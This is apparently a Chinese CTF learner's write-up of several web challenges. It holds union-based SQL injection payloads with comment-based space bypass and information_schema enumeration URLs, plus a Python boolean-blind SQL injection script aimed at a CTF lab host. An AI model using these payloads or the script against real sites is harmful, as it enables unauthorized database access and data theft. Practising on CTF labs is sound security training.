[FSCTF 2023]webshell是啥捏
直接复制传参发现然后命令执行发现成功了。。。。
cat /flag.txt
[NSSCTF 2022 Spring Recruit]babysql
提示是sql注入,空格绕过,试一下
看到了黑名单
利用/**/来代替空格
1'/**/union/**/select/**/database()/**/'
paylaod:
1'union/**/select/**/(select/**/group_concat(flag)/**/from/**/flag)/**/'
(select group_concat(flag) from flag)
是一个子查询,用于从名为"flag"的表中获取flag
列的所有值,并使用group_concat
函数将这些值合并为一个逗号分隔的字符串。
得到flag
也可以利用布尔盲注脚本
import requests asc_str = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~' burp0_url = "http://node5.anna.nssctf.cn:28621/" burp0_headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded" } content = '' for pos in range(1, 100): min_num = 32 max_num = 126 mid_num = (min_num + max_num) // 2 while (min_num < max_num): # payload = "tarnish'/**/!=!/**/(ascii(mid((select/**/group_concat(schema_name)/**/from/**/information_schema.schemata),{},1))>{})/**/!=!/**/'1".format(pos, mid_num) # payload = "tarnish'/**/!=!/**/(ascii(mid((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema='test'),{},1))>{})/**/!=!/**/'1".format(pos, mid_num) # payload = "tarnish'/**/!=!/**/(ascii(mid((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name='flag'),{},1))>{})/**/!=!/**/'1".format(pos, mid_num) payload = "tarnish'/**/!=!/**/(ascii(mid((select/**/group_concat(flag)/**/from/**/test.flag),{},1))>{})/**/!=!/**/'1".format( pos, mid_num) burp0_data = {"username": payload} # tarnish是题目给的要求 resp = requests.post(burp0_url, headers=burp0_headers, data=burp0_data) if 'string(39)' in resp.text: min_num = mid_num + 1 else: max_num = mid_num mid_num = (min_num + max_num) // 2 content += chr(min_num) print(content)
还可以利用异或进行注入,第一次听说,给大家一篇大佬的博客
[NSSCTF 2022 Spring Recruit]babysql_末初的技术博客_51CTO博客
[MoeCTF 2022]Sqlmap_boy
看源代码看到了sql语句
分析一下,闭合方式为双引号闭合
那么我们试试万能语句
发现进来了
secrets.php?id=-1' union select 1,2,3 --+
看回显位
secrets.php?id=-1' union select 1,2,database() --+
查库
查表
secrets.php?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = 'moectf' --+
查列
查字段内容,得到flag
没什么过滤就是要注意最后的注释,用#不行
[网鼎杯 2018]Fakebook
这道题先放掉,因为sql和反序列化都不是很强
[MoeCTF 2021]Do you know HTTP
提示说试试bp
让改请求方式
回显说:只有本地ip地址才可以哦!
构造xff,到xff怎么都不显示了,不知道是什么问题,我看评论区也有这种问题